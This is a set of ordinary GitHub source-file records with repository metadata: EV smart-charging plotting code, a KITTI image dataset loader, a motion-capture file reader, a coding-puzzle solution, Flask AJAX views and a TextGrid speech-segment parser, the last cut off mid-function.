how='left', left_on='time', right_on='time')\n \n # in df['SOC] replace nan with most recent value\n df['SOC_lin'] = df['SOC'].interpolate(method='linear')\n df['SOC'] = df['SOC'].fillna(method='ffill')\n\n # Use\n u = df.SOC.diff().dropna()\n u[u>0] = 0\n u = u.abs()\n df['use'] = u\n\n # Use linearly interpolated SOC\n u_lin = df.SOC_lin.diff().dropna()\n u_lin[u_lin>0] = 0\n u_lin = u_lin.abs()\n df['use_lin'] = u_lin\n # Daily average use\n df['use_dailyaverage'] = df[df['use_lin'] != 0]['use_lin'].mean()\n\n # Calculate 7-day rolling mean of use_lin\n roll_length = 7 # If changed, also change in legend\n df['use_rolling'] = df[df['use_lin'] != 0]['use_lin'].rolling(roll_length*24, min_periods=24).mean()\n df['use_rolling'] = df['use_rolling'].fillna(0)\n # Issues: When subsetting on NOT plugged_in, the roll length of 7*24 steps becomes more than 7 days\n # Issues: Initial 7 days\n\n # Calculate 14-day rolling mean of use (use to estimate use_lin. Without cheating)\n roll_length = 10\n df['use_org_rolling'] = df['use'].rolling(roll_length*24, min_periods=12).mean() # min periods shouldn't be too large or too small\n df['use_org_rolling'] = df['use_org_rolling'].fillna(0) # Estimate u_hat 12 hours with 0\n\n # Exponential moving average\n hlf_life = 2 # days\n df['use_ewm'] = df[df['use_lin'] != 0]['use_lin'].ewm(span=roll_length*24, min_periods=24).mean()\n df['use_ewm'] = df['use_ewm'].fillna(0)\n\n # Median prediction of efficiency\n df['efficiency_median'] = np.median(df['efficiency'].dropna().unique())\n\n # Add vehicle id\n df['vehicle_id'] = id\n\n # Assure non-Nan at crucial places\n if any(df['use'].isna()):\n df = df[~df['use_lin'].isna()]\n print('Rows with NaNs in Use were deleted.')\n\n else:\n df = dfvehicle\n firsttime = df.index[0]\n lasttime = df.index[-1]\n\n #################### START THE PLOTTING ###########################################\n fig = go.Figure([go.Scatter(\n x=df.index,\n y=df['z_act'],\n mode='lines',\n name = \"Plugged-in (actual)\",\n line=dict(\n color='black',\n dash='dot',\n ))])\n\n # Plot the result\n fig.add_trace(go.Scatter(\n x=df.index,\n y=df['z_plan'],\n mode='lines',\n name='Plugged-in (planned)',\n line=dict(\n color='black',\n )))\n\n fig.add_trace(go.Scatter(\n x=df.index,\n y=df['z_plan_everynight'],\n mode='lines',\n name='Plugged-in (assumption)',\n line=dict(\n color='black',\n )))\n\n fig.add_trace(go.Scatter(\n x=df.index,\n y=df['charge'],\n mode='lines',\n name='Charge',\n marker=dict(\n size=10,\n opacity=0.8\n ),\n line=dict(\n color='green',\n width=2\n )\n ))\n\n fig.add_trace(go.Scatter(\n x=df.index,\n y=df['use'],\n mode='lines',\n name='Use',\n line=dict(\n color='red',\n width=2\n )\n ))\n\n fig.add_trace(go.Scatter(\n x=df.index,\n y=df['use_lin'],\n mode='lines',\n name='Use (interpolated)',\n line=dict(\n color='red',\n width=2,\n dash='dot'\n )\n ))\n\n # fig.add_trace(go.Scatter(\n # x=df.index,\n # y=df['use_rolling'],\n # mode='lines',\n # name='Use ('+str(7)+' day rolling mean) [kWh]',\n # line=dict(\n # color='red',\n # width=2,\n # dash='dot'\n # )\n # ))\n\n # fig.add_trace(go.Scatter(\n # x=df.index,\n # y=df['use_ewm'],\n # mode='lines',\n # name='Use (Exponentially Weighted Moving Average with half life = '+str(2)+') [kWh]',\n # line=dict(\n # color='red',\n # width=2,\n # dash='dash'\n # )\n # ))\n\n # fig.add_trace(go.Scatter(\n # x=df.index,\n # y=df['use_dailyaverage'],\n # mode='lines',\n # name='Use daily average (outside of plug-in) [kWh]',\n # line=dict(\n # color='red',\n # width=0.5,\n # dash='dash'\n # )\n # ))\n\n fig.add_trace(go.Scatter(\n x=df.index,\n y=df['price'],\n mode='lines',\n name='Price',\n line=dict(\n color='purple',\n width=1\n )\n ))\n\n fig.add_trace(go.Scatter(\n x=df.index,\n y=df['SOC'],\n mode='lines',\n name = \"SOC\",\n line=dict(\n color='lightblue',\n width=2\n )\n ))\n\n fig.add_trace(go.Scatter(\n x=df.index,\n y=df['trueprice'],\n mode='lines',\n name='Price',\n line=dict(\n color='purple',\n width=1\n )\n ))\n\n fig.add_trace(go.Scatter(\n x=df.index,\n y=df['SOCmax'],\n mode='lines',\n name = \"SOC max [kWh]\",\n line=dict(width=2, color='grey') #color='DarkSlateGrey')\n # Add index value to hovertext\n # hovertext = df.index\n ))\n\n if plot_efficiency_and_SOCmin:\n fig.add_trace(go.Scatter(\n x=df.index,\n y=df['efficiency']*100,\n mode='lines',\n name = \"Efficiency [%]\",\n line=dict(width=2, color='DarkSlateGrey')\n ))\n\n fig.add_trace(go.Scatter(\n x=df.index,\n y=df['efficiency_median']*100,\n mode='lines',\n name = \"Efficiency median [%]\",\n line=dict(width=2, color='DarkSlateGrey', dash='dot')\n ))\n\n fig.add_trace(go.Scatter(\n x=df.index,\n y=df['SOC_lin'],\n mode='lines',\n name = \"SOC (linear interpolation)\",\n line=dict(\n color='lightblue',\n width=2,\n dash='dot'\n )\n ))\n\n fig.add_trace(go.Scatter(\n x=df.index,\n y=df['SOCmin_everymorning'],\n mode='lines',\n name = \"Minimum SOC\",\n line=dict(\n color='lightblue',\n width=2 , dash='dash'\n )\n ))\n\n fig.add_trace(go.Scatter(\n x=df.index,\n y=df['BatteryCapacity'],\n mode='lines',\n name = \"Battery Capacity [kWh]\",\n line=dict(\n color='darkgrey',\n dash='dash'\n )))\n\n fig.add_trace(go.Scatter(\n x=df.index,\n y=df['use_org_rolling'],\n mode='lines',\n name = \"Rolling Use (10 days)\",\n line=dict(\n color='red',\n width=1,\n dash='dash'\n )\n ))\n\n if vertical_hover:\n # Add vertical hover lines\n fig.update_layout(\n hovermode='x unified',\n hoverdistance=100, # Distance to show hover label of data point\n spikedistance=1000, # Distance to show spike\n hoverlabel=dict(\n bgcolor=\"white\",\n font_size=16,\n font_family=\"Rockwell\"\n )\n )\n \n # Set xticks to be individual days\n fig.update_xaxes(\n tickmode = 'array',\n tickvals = [firsttime + datetime.timedelta(days=i) for i in range((lasttime-firsttime).days+1)],\n ticktext = [str(firsttime + datetime.timedelta(days=i))[:10] for i in range((lasttime-firsttime).days+1)],\n tickangle = 45\n )\n # Add legend\n fig.update_layout(\n title_text=\"Charging by \" +str(var) + \"=\"+ str(id) + \" from \"+str(firsttime)+\" to \"+str(lasttime), # title of plot\n xaxis_title_text=\"Date\", # xaxis label\n yaxis_title_text=\"kWh or True-False [1, -1]\", # yaxis label\n #font=dict(\n # size=18,\n # color=\"RebeccaPurple\"\n #)\n )\n\n if layout is not None:\n # Export html\n fig.write_html(pathhtml + imgtitle + str(id) + \".html\")\n fig.update_layout(layout)\n # For the x-ticks, only show every 7th day\n fig.update_xaxes(\n tickmode = 'array',\n tickvals = [firsttime + datetime.timedelta(days=i) for i in range((lasttime-firsttime).days+1) if i%7==0],\n ticktext = [str(firsttime + datetime.timedelta(days=i))[:10] for i in range((lasttime-firsttime).days+1) if i%7==0],\n tickangle = 45\n )\n # Remove x-ticks and xaxis title text (TEMPORARY)\n # fig.update_xaxes(\n # showticklabels=False,\n # title_text=\"\"\n # )\n\n # Subset data to 2022-09-20 to 2022-09-30\n # fig.update_xaxes(\n # range=['2022-09-20', '2022-09-30']\n # )\n # fig.update_yaxes(\n # range=[-1, 10]\n # )\n\n # Decrease linewidth of all lines\n for i in range(len(fig.data)):\n fig.data[i].line.width = 1.5\n # Export pdf\n fig.write_image(path + imgtitle + str(id) + \".pdf\")\n \n if not df_only:\n fig.show()\n return df\n\ndef MontasSmartCharge(dfv, u, z, L, b0, r, c_tilde):\n # define c as the minimum between price and trueprice ignoring nan to allow benefit of the DK1/DK2 doubt in favor of Montas algorithm\n c = dfv[['price', 'trueprice']].min(axis=1, skipna=True)\n x = dfv['charge']\n u = u\n z = z\n # b_t+1 = b0 + r*x - u\n b = np.zeros(len(dfv)+1)\n b[0] = b0\n for i in range(len(dfv)):\n b[i+1] = b[i] + r*x[i] - u[i]\n total_cost = np.sum(x * c) - c_tilde * (b[-1] - b0)\n prob = {'x':x[:L], 'b':b[:(L+1)], 'u':u[:L], 'c':c[:L], 'z':z[:L], 'objective':total_cost}\n return(prob, x, b)","repo_name":"davidripsen/code_Smart_Charging","sub_path":"MPC/FunctionCollection.py","file_name":"FunctionCollection.py","file_ext":"py","file_size_in_byte":42318,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"68"} +{"seq_id":"5028507604","text":"from __future__ import absolute_import\nfrom __future__ import division\nimport torch as t\nfrom skimage import transform as sktsf\nfrom torchvision import transforms as tvtsf\nfrom data import util\nimport numpy as np\nfrom utils.config import opt\nfrom math import pi\nfrom data.kitti_img_dataset import ImageKITTIDataset\n\ndef inverse_normalize(img):\n # approximate un-normalize for visualize\n return (img * 0.225 + 0.45).clip(min=0, max=1) * 255\n\n\ndef pytorch_normalze(img):\n \"\"\"\n https://github.com/pytorch/vision/issues/223\n return appr -1~1 RGB\n \"\"\"\n normalize = tvtsf.Normalize(mean=[0.485, 0.456, 0.406],\n std=[0.229, 0.224, 0.225])\n img = normalize(t.from_numpy(img))\n return img.numpy()\n\ndef preprocess(img, min_size=375, max_size=1242):\n \"\"\"Preprocess an image for feature extraction.\n The length of the shorter edge is scaled to :obj:`self.min_size`.\n After the scaling, if the length of the longer edge is longer than\n :param min_size:\n :obj:`self.max_size`, the image is scaled to fit the longer edge\n to :obj:`self.max_size`.\n After resizing the image, the image is subtracted by a mean image value\n :obj:`self.mean`.\n Args:\n img (~numpy.ndarray): An image. This is in CHW and RGB format.\n The range of its value is :math:`[0, 255]`.\n Returns:\n ~numpy.ndarray: A preprocessed image.\n \"\"\"\n C, H, W = img.shape\n scale1 = min_size / min(H, W)\n scale2 = max_size / max(H, W)\n scale = min(scale1, scale2)\n img = img / 255.\n img = sktsf.resize(img, (C, H * scale, W * scale), mode='reflect',anti_aliasing=False)\n # both the longer and shorter should be less than\n # max_size and min_size\n normalize = pytorch_normalze\n return normalize(img)\n\n\nclass Transform(object):\n\n def __init__(self, min_size=375, max_size=1242):\n self.min_size = min_size\n self.max_size = max_size\n\n def __call__(self, in_data):\n img, bbox, label, depth, y_rot = in_data\n _, H, W = img.shape\n img = preprocess(img, self.min_size, self.max_size)\n _, o_H, o_W = img.shape\n scale = o_H / H\n bbox = util.resize_bbox(bbox, (H, W), (o_H, o_W))\n\n # horizontally flip\n img, params = util.random_flip(\n img, x_random=True, return_param=True)\n bbox = util.flip_bbox(\n bbox, (o_H, o_W), x_flip=params['x_flip'])\n if params['x_flip']:\n for i in range(len(y_rot)):\n theta = float(y_rot[i])\n if theta > 0:\n y_rot[i] = pi - theta\n if theta < 0:\n y_rot[i] = -pi - theta\n y_rot[i]\n if theta == 0:\n y_rot[i] = 3.14\n\n return img, bbox, label, depth, y_rot, scale\n\n\n\n'''\n The bounding boxes are packed into a two dimensional tensor of shape\n :math:`(R, 4)`, where :math:`R` is the number of bounding boxes in\n the image. The second axis represents attributes of the bounding box.\n They are :math:`(y_{min}, x_{min}, y_{max}, x_{max})`, where the\n four attributes are coordinates of the top left and the bottom right\n vertices.\n \n The labels are packed into a one dimensional tensor of shape :math:`(R,)`.\n :math:`R` is the number of bounding boxes in the image.\n The class name of the label :math:`l` is :math:`l` th element of\n :obj:`VOC_BBOX_LABEL_NAMES`.\n\n The array :obj:`difficult` is a one dimensional boolean array of shape\n :math:`(R,)`. :math:`R` is the number of bounding boxes in the image.\n If :obj:`use_difficult` is :obj:`False`, this array is\n a boolean array with all :obj:`False`.\n \n The type of the image, the bounding boxes and the labels are as follows.\n * :obj:`img.dtype == numpy.float32`\n * :obj:`bbox.dtype == numpy.float32`\n * :obj:`label.dtype == numpy.int32`\n * :obj:`difficult.dtype == numpy.bool`\n\n'''\n\n\nclass Dataset:\n def __init__(self, opt):\n self.opt = opt\n self.db = ImageKITTIDataset(opt.train_data_dir)\n self.tsf = Transform(opt.min_size, opt.max_size)\n\n def __getitem__(self, idx):\n ori_img, bbox, label, difficult, depth, y_rot = self.db.get_example(idx)\n '''\n If :obj:`return_difficult == True`, this dataset returns corresponding\n :obj:`img, bbox, label, difficult`. :obj:`difficult` is a boolean array\n that indicates whether bounding boxes are labeled as difficult or not.\n '''\n img, bbox, label, depth, y_rot, scale = self.tsf((ori_img, bbox, label, depth, y_rot))\n # TODO: check whose stride is negative to fix this instead copy all\n # some of the strides of a given numpy array are negative.\n return img.copy(), bbox.copy(), label.copy(), depth.copy(), y_rot.copy(), scale\n\n def __len__(self):\n return len(self.db)\n \n\nclass TestDataset:\n def __init__(self, opt):\n self.opt = opt\n self.db = ImageKITTIDataset(opt.test_data_dir)\n\n def __getitem__(self, idx):\n ori_img, bbox, label, difficult, depth, y_rot = self.db.get_example(idx)\n img = preprocess(ori_img)\n return img, ori_img.shape[1:], bbox, label, difficult\n\n def __len__(self):\n return len(self.db)\n","repo_name":"YupengHan/FusionNet","sub_path":"data/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":5291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"41587154231","text":"\"\"\"Methods for opening cortex files\n\n\"\"\"\n\nimport logging\nfrom pathlib import Path\nfrom pprint import pprint\nimport re\n\nimport pandas as pd\n\nLOG = logging.getLogger(__name__)\n\n\ndef open(path: Path):\n \"\"\"Open a cortex motion capture file\n\n Restructures columns to use a single index\n\n Returns:\n A pandas dataframe index by timedelta with columns\n\n .. code-block:: python\n\n Frame#,\n FHEAD.X, FHEAD.Y, FHEAD.Z,\n RHEAD.X, RHEAD.Y, RHEAD.Z,\n THEAD.X, THEAD.Y, THEAD.Z,\n LHEAD.X, LHEAD.Y, LHEAD.Z,\n C7.X, C7.Y, C7.Z,\n BBAC.X, BBAC.Y, BBAC.Z, \n Offset_Nav.X, Offset_Nav.Y,Offset_Nav.Z,\n XYPH.X, XYPH.Y, XYPH.Z,\n STRN.X, STRN.Y, STRN.Z,\n LSHO.X, LSHO.Y, LSHO.Z,\n RSHO.X, RSHO.Y, RSHO.Z,\n LASIS.X, LASIS.Y, LASIS.Z,\n LPSIS.X, LPSIS.Y, LPSIS.Z,\n RASIS.X, RASIS.Y, RASIS.Z,\n RPSIS.X, RPSIS.Y, RPSIS.Z,\n SACRUM.X, SACRUM.Y, SACRUM.Z,\n RLM.X, RLM.Y, RLM.Z,\n RHEE.X, RHEE.Y, RHEE.Z,\n RTOE.X, RTOE.Y, RTOE.Z,\n RMT5.X, RMT5.Y, RMT5.Z,\n LHEE.X, LHEE.Y, LHEE.Z,\n LTOE.X, LTOE.Y, LTOE.Z,\n LMT5.X, LMT5.Y, LMT5.Z,\n V_RShoulder.X, V_RShoulder.Y, V_RShoulder.Z,\n V_LShoulder.X, V_LShoulder.Y, V_LShoulder.Z,\n V_Neck.X, V_Neck.Y, V_Neck.Z,\n V_LShoulder_Dyn.X, V_LShoulder_Dyn.Y, V_LShoulder_Dyn.Z,\n V_RShoulder_Dyn.X, V_RShoulder_Dyn.Y, V_RShoulder_Dyn.Z,\n V_Mid_ASIS_Dyn.X, V_Mid_ASIS_Dyn.Y, V_Mid_ASIS_Dyn.Z,\n V_Head.X, V_Head.Y, V_Head.Z,\n V_Mid_PSIS.X, V_Mid_PSIS.Y, V_Mid_PSIS.Z,\n V_RFoot.X, V_RFoot.Y, V_RFoot.Z,\n V_LFoot.X, V_LFoot.Y, V_LFoot.Z,\n V_RAnkle_Dyn.X, V_RAnkle_Dyn.Y, V_RAnkle_Dyn.Z,\n V_Neck2.X, V_Neck2.Y, V_Neck2.Z,\n V_Pelvis.X, V_Pelvis.Y, V_Pelvis.Z,\n V_Sacrum.X, V_Sacrum.Y, V_Sacrum.Z\n\n Note: \n may recieve warnings due to extra data existing to the right of the recorded data, safe to ignore\n\n \"\"\"\n LOG.info(\"reading cortex trc file: %s\", str(path))\n\n # first read only the column names\n try:\n cols = pd.read_csv(\n path, sep=\"\\t\", header=[3, 4], nrows=0, error_bad_lines=False\n )\n except (pd.errors.ParserError):\n cols = pd.read_csv(\n path,\n sep=\"\\t\",\n header=[3, 4],\n nrows=0,\n engine=\"python\",\n error_bad_lines=False,\n )\n\n # LOG.debug(\"%s\", cols.to_string())\n\n # edit column names to make column names into single level index similar to dflow data\n # I am droping the number value associated with each marker (We need only X, Y, Z)\n new_cols = []\n a_col_name = \"\"\n for col in cols:\n if \"Unnamed\" in col[0]:\n if \"Unnamed\" not in col[1]:\n new_cols.append(a_col_name + \".\" + col[1][0])\n else:\n pass\n else:\n if \"Unnamed\" in col[1]:\n new_cols.append((col[0]))\n else:\n new_cols.append((col[0] + \".\" + col[1][0]))\n a_col_name = col[0]\n\n # LOG.debug(\"\\n%s\\ntotal=%d\", '\\n'.join(f\"\\t{s}\" for s in new_cols), len(new_cols))\n\n # read the data but use my edited column names\n try:\n _df = pd.read_csv(\n path,\n sep=\"\\t\",\n names=new_cols,\n usecols=new_cols,\n header=None,\n skiprows=[0, 1, 2, 3, 4, 5],\n index_col=False,\n skip_blank_lines=False,\n error_bad_lines=False,\n )\n except (pd.errors.ParserError):\n _df = pd.read_csv(\n path,\n sep=\"\\t\",\n names=new_cols,\n usecols=new_cols,\n header=None,\n skiprows=[0, 1, 2, 3, 4, 5],\n index_col=False,\n skip_blank_lines=False,\n error_bad_lines=False,\n engine=\"python\",\n )\n\n # convert to a timedelta index\n _df[\"Time\"] = pd.to_timedelta(_df[\"Time\"], unit=\"s\")\n _df.set_index(\"Time\", inplace=True)\n\n if LOG.isEnabledFor(logging.DEBUG):\n LOG.debug(\n \"file as read into memory:\\n%s\", _df.to_string(max_rows=20, line_width=200)\n )\n # LOG.debug(\"last modified: %s\", time.ctime(os.path.getctime(path)))\n\n # LOG.debug('pandas DataFrame.info(): \\n%s', _df.info(verbose=True))\n\n return _df\n\n\ndef probe_elapsed_time(path: Path):\n \"\"\"get elapsed time from cortex file\n\n Args:\n path: pathobject to cortex file\n \n Returns:\n elapsed time as a timedelta\n\n \"\"\"\n LOG.info(\"probing duration for: %s\", str(path))\n\n try:\n df = pd.read_csv(\n path,\n sep=\"\\t\",\n header=None,\n names=[\"Frame#\", \"Time\"],\n usecols=[\"Frame#\", \"Time\"],\n skiprows=[0, 1, 2, 3, 4, 5],\n skip_blank_lines=False,\n error_bad_lines=False,\n )\n except (pd.errors.ParserError):\n df = pd.read_csv(\n path,\n sep=\"\\t\",\n header=None,\n names=[\"Frame#\", \"Time\"],\n usecols=[\"Frame#\", \"Time\"],\n engine=\"python\",\n skiprows=[0, 1, 2, 3, 4, 5],\n skip_blank_lines=False,\n error_bad_lines=False,\n )\n\n if df[\"Time\"].size > 1:\n return pd.Timedelta(df[\"Time\"].iloc[-1] - df[\"Time\"].iloc[0], unit=\"s\")\n else:\n LOG.error(\"unable to parse elapsed time\")\n return pd.NaT\n\n\ndef get_task_name(path: Path):\n \"\"\"return task according to file name\"\"\"\n\n # return none if regex fails\n task_name = None\n\n match = re.search(r\".*?_([a-z]+)\\.?(\\d{1,2}).*?\", path.name.lower())\n if match:\n task_name = \"_\".join(match.groups())\n\n return task_name\n\n\ndef multiindex(df):\n \"\"\" \n transform cortex mocap data to use multi-indexed columns\n\n Returns:\n\n \"\"\"\n\n # grab columns\n mocap = df.loc[:, df.columns.str.contains(r\"\\.[x,y,z]{1}\", case=False)]\n\n # multi-index\n mocap.columns = pd.MultiIndex.from_tuples(\n c.lower().split(\".\") for c in mocap.columns\n )\n\n return mocap\n","repo_name":"MVDLab/VMIntegration","sub_path":"hmpldat/file/cortex.py","file_name":"cortex.py","file_ext":"py","file_size_in_byte":6262,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"18356933058","text":"############################# PROBLEM OF THE DAY - 22nd March 2023 #################################################\n#-------------------------------------------------------------------------------------------------------------------\n\n\n# Given a string S. In one operation, you can remove the substring \"pr\" from the string S and get amount X or \n# you can remove the substring \"rp\" and get the amount Y. \n# Find the maximum amount you can get if you perform zero or more such operations optimally. \n\n\nclass Solution:\n def solve (self, X, Y, S):\n #code here\n x,y = 0,0\n while(True):\n if(X>=Y):\n if('pr'in S):\n x +=S.count('pr')\n S=S.replace('pr','')\n elif('rp' in S):\n y+=S.count('rp')\n S=S.replace('rp','')\n else:\n break\n \n if(Y>X):\n if('rp'in S):\n y+=S.count('rp')\n S=S.replace('rp','')\n elif('pr'in S):\n x+=S.count('pr')\n S=S.replace('pr','')\n else:\n break\n \n return (X*x)+(y*Y)","repo_name":"Arman-ali-khan-786/competitve_programming","sub_path":"gfg/potd/String_rp_or_pr.py","file_name":"String_rp_or_pr.py","file_ext":"py","file_size_in_byte":1240,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"18824298974","text":"from flask import render_template, redirect, request, url_for, session, jsonify\nfrom flask_login import login_user, login_required, logout_user, current_user\nfrom . import ajax\nfrom model.model import *\n\n\n@ajax.route('/thumb', methods=['POST', 'GET'])\n@login_required\ndef thumb():\n is_del = request.args.get('del', 0, type=int)\n operand = request.args.get('oper', 0, type=int)\n operand_id = request.args.get('id', 0, type=int)\n oper = OPERAND[operand](id=operand_id).select(getone=True)\n is_thumb = oper.is_thumb(current_user.id)\n if is_del and is_thumb:\n oper.del_thumb(current_user.id)\n elif not is_thumb:\n oper.set_thumb(current_user.id)\n return True\n\n\n@ajax.route('/collect', methods=['POST', 'GEt'])\n@login_required\ndef collect():\n is_del = request.args.get('del', 0, type=int)\n operand = request.args.get('oper', 0, type=int)\n operand_id = request.args.get('id', 0, type=int)\n oper = OPERAND[operand](id=operand_id).select(getone=True)\n is_collect = oper.is_collect(current_user.id)\n if is_del and is_collect:\n oper.del_collect(current_user.id)\n elif not is_collect:\n oper.set_collect(current_user.id)\n return True\n\n\n@ajax.route('/follow', methods=['POST', 'GET'])\n@login_required\ndef follow():\n user_id = request.args.get('id', -1, type=int)\n print(user_id, current_user.id)\n user = Account(id=user_id).select(getone=True)\n if user_id is -1:\n return False\n if current_user.is_follow(user):\n current_user.unfollow(user)\n result = -1\n else:\n current_user.follow(user)\n result = 1\n return jsonify({'f': result})\n\n\n@ajax.route('/visitor', methods=['POST', 'GET'])\n@login_required\ndef get_visitor():\n if current_user and current_user.email == \"voterlin@foxmail.com\":\n visitor = Visitor().select(oderby=\"member_since\", isasc=False)\n return jsonify(visitor)\n return \"None Info\"\n\n\n@ajax.route('/account', methods=['POST', 'GET'])\n@login_required\ndef get_account():\n if current_user.email == \"voterlin@foxmail.com\":\n account = Account().select(oderby=\"timestamp\", isasc=False)\n return jsonify(account)\n return \"None Info\"\n\n\n@ajax.route('/table', methods=['GET'])\ndef get_table():\n # 0 one_day / 1 top_word / 2 one_word\n type = request.args.get('type', 0, type=int)\n if type is 0:\n time = now(1)\n fre = Frequency(time=time).select(oderby='times', isasc=False, limit=20)\n return jsonify(day_search_result(fre))\n elif type is 1:\n web = Website().select(oderby='time', isasc=False, limit=20)\n return jsonify(top_word_result(web))\n elif type is 3:\n web = Website().select(oderby='time', isasc=False, limit=20)\n return jsonify(one_day_news_result(web))\n elif type is 2:\n word = request.args.get('word', '', type=str)\n fre = Frequency(word=word).select(oderby='time', isasc=True, limit=20)\n return jsonify(word_search_result(fre))\n\n\ndef one_day_news_result(web):\n data = []\n lables = []\n for w in web:\n data.append(w.news_count)\n lables.append(str(w.time))\n return {'data': data, 'labels': lables}\n\n\ndef top_word_result(web):\n data = []\n lables = []\n for w in web:\n data.append(w.top_word_count)\n lables.append(w.top_word)\n return {'data': data, 'labels': lables}\n\n\ndef day_search_result(fre):\n data = []\n lables = []\n for f in fre:\n data.append(f.times)\n lables.append(f.word)\n return {'data': data, 'labels': lables}\n\n\ndef word_search_result(fre):\n data = []\n lables = []\n for f in fre:\n data.append(f.times)\n lables.append(str(f.time))\n return {'data': data, 'labels': lables}\n","repo_name":"VintLin/Hot-News","sub_path":"App/ajax/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3735,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"68"} +{"seq_id":"7137962565","text":"import pandas as pd\nimport numpy as np\nimport textgrid\nimport os\nimport re, sys\n\npattern = \"([A-Za-z0-1@]+[A-Za-z0-1@]+)\"\n\ndef read_sentences(rootpath):\n file_list = os.listdir(rootpath)\n return file_list\n\nclass Sentences:\n\n def __init__(self):\n self.word_list = []\n\n def read_from_textgrid(self, file_textgrid_obj):\n '''\n Assume: a loads of textgrids in a path, each of which has a 'words' tier and a 'segments' tier.\n Segments tier includes all segments of every word in SAMPA.\n Read all textgrids files one by one. Read every segment corresponding to certain word and output\n infomation about this word into csv. Information including: starting/ending time, word, segments of\n the word, starting/ending time of this segment.\n :param file_list: all files in the path\n :return: nothing\n '''\n global intervals_words, intervals_segments\n\n tier_list = file_textgrid_obj.tiers\n interval_num = 0\n\n for each_tier in tier_list:\n if each_tier.name == 'words':\n tier_words = each_tier\n intervals_words = tier_words.intervals\n elif each_tier.name == 'segments':\n tier_segments = each_tier\n intervals_segments = tier_segments.intervals\n #get segments & words intervals in list\n try:\n for each_word in intervals_words:\n word_start_time = each_word.minTime\n word_end_time = each_word.maxTime\n word_mark = each_word.mark\n segment_list=[]\n\n a_word = Word(word_start_time, word_end_time, word_mark, segment_list)\n try:\n while (intervals_segments[interval_num].minTime >= word_start_time) \\\n & (intervals_segments[interval_num].maxTime <= word_end_time) \\\n & (intervals_segments[interval_num].minTime != intervals_segments[interval_num].maxTime):\n\n segment_mark = intervals_segments[interval_num].mark\n m = re.match(pattern, segment_mark)\n if m:\n tmp_list = list(segment_mark)\n for each_seg in tmp_list:\n segment_list.append(each_seg)\n #print(each_seg)\n else:\n segment_list.append(segment_mark)\n interval_num += 1\n except IndexError:\n interval_num = 0\n a_word.update_segment_list(segment_list)\n self.word_list.append(a_word)\n except AttributeError:\n print('tier words is empty or does not exist ')\n\nclass Word:\n def __init__(self, word_start_time, word_end_time, word_mark, segment_list):\n self.word_mark = word_mark\n self.word_start_time = word_start_time\n self.word_end_time = word_end_time\n self.segment_list = segment_list\n self.event_list = []\n self.num_in_event_list = 0\n self.cues_list = []\n\n def update_segment_list(self, new_segment_list):\n self.segment_list = new_segment_list\n\n def update_event_list (self, new_event_list):\n self.event_list = new_event_list\n\n def update_num_in_event_list(self, new_num_in_event_list):\n self.num_in_event_list = new_num_in_event_list\n\n def update_cues_list (self, new_cues_list):\n self.cues_list = new_cues_list\n\ndef create_event(a_sentence, filename):\n\n word_obj_list = a_sentence.word_list\n length = len(word_obj_list)\n event_list = []\n each_event_list = []\n\n for each_word in word_obj_list:\n #print(str(each_word.segment_list)+\" \"+each_word.word_mark)\n if each_word.word_mark != '

        ':\n each_event_list.append(each_word)\n else:\n if each_event_list != []:\n event_list.append(each_event_list)\n each_event_list = []\n else:\n each_event_list = []\n if each_event_list != []:\n event_list.append(each_event_list)\n\n #print(event_list)\n count_event =0\n count_word = 0\n num_in_event_list = 0\n\n\n for each_word in word_obj_list:\n if each_word.word_mark != '

        ':\n each_word.update_event_list(event_list[count_event])\n each_word.update_num_in_event_list(num_in_event_list)\n num_in_event_list += 1\n count_word += 1\n else:\n if count_word != 0 :\n #print(filename+str(count_word)+\" \"+str(len(word_obj_list)-1))\n\n if ((count_word+1) <= (len(word_obj_list)-1)):\n if (word_obj_list[count_word+1].word_mark != '

        '):\n count_event += 1\n count_word += 1\n num_in_event_list = 0\n else:\n count_word += 1\n num_in_event_list = 0\n\n else:\n count_event += 1\n count_word += 1\n num_in_event_list = 0\n\n elif count_word == 0:\n count_word += 1\n num_in_event_list = 0\n\n #print(each_word.word_mark+\" \"+str(each_word.event_list) + \" \"+str(each_word.num_in_event_list))\n\n\ndef create_cues(a_sentence, existing_np, filename):\n word_obj_list = a_sentence.word_list\n df = existing_np\n for each_word in word_obj_list:\n cue_word_list = []\n cue_segment_list = []\n if each_word.word_mark != '

        ':\n event_list = each_word.event_list\n length = len(event_list)\n num_in_event_list = each_word.num_in_event_list\n if 0 <= each_word.num_in_event_list -2:\n cue_word_list.append(event_list[num_in_event_list-2])\n\n if 0 <= each_word.num_in_event_list -1:\n cue_word_list.append(event_list[num_in_event_list-1])\n\n cue_word_list.append(each_word)\n\n if each_word.num_in_event_list+1 <= length-1:\n cue_word_list.append(event_list[num_in_event_list+1])\n\n if each_word.num_in_event_list+2 <= length-1:\n cue_word_list.append(event_list[num_in_event_list+2])\n\n if cue_word_list[0].num_in_event_list -1 >= 0:\n vor_word = event_list[cue_word_list[0].num_in_event_list -1]\n vor_segment = vor_word.segment_list[len(vor_word.segment_list)-1]\n cue_segment_list.append(vor_segment)\n else:\n cue_segment_list.append(\"#\")\n\n for each_cue_word in cue_word_list:\n for each_cue_segment in each_cue_word.segment_list:\n cue_segment_list.append(each_cue_segment)\n\n if cue_word_list[len(cue_word_list)-1].num_in_event_list +1 <= len(event_list) -1:\n nach_word = event_list[cue_word_list[len(cue_word_list)-1].num_in_event_list +1]\n #print(nach_word.segment_list)\n try:\n nach_segment = nach_word.segment_list[0]\n cue_segment_list.append(nach_segment)\n except IndexError:\n print(filename)\n else:\n cue_segment_list.append(\"#\")\n #print(cue_segment_list)\n\n whole_cue = []\n\n for each_cue_word in cue_word_list:\n whole_cue.append(each_cue_word.word_mark)\n whole_cue.append(\"_\")\n\n length = len(cue_segment_list)\n count = 0\n\n for each_cue_segment in cue_segment_list:\n if count == 0:\n whole_cue.append(each_cue_segment)\n whole_cue.append(cue_segment_list[count + 1])\n whole_cue.append(\"_\")\n count += 1\n\n elif count == length - 2:\n whole_cue.append(each_cue_segment)\n whole_cue.append(cue_segment_list[count + 1])\n count += 1\n\n elif count == length - 1:\n 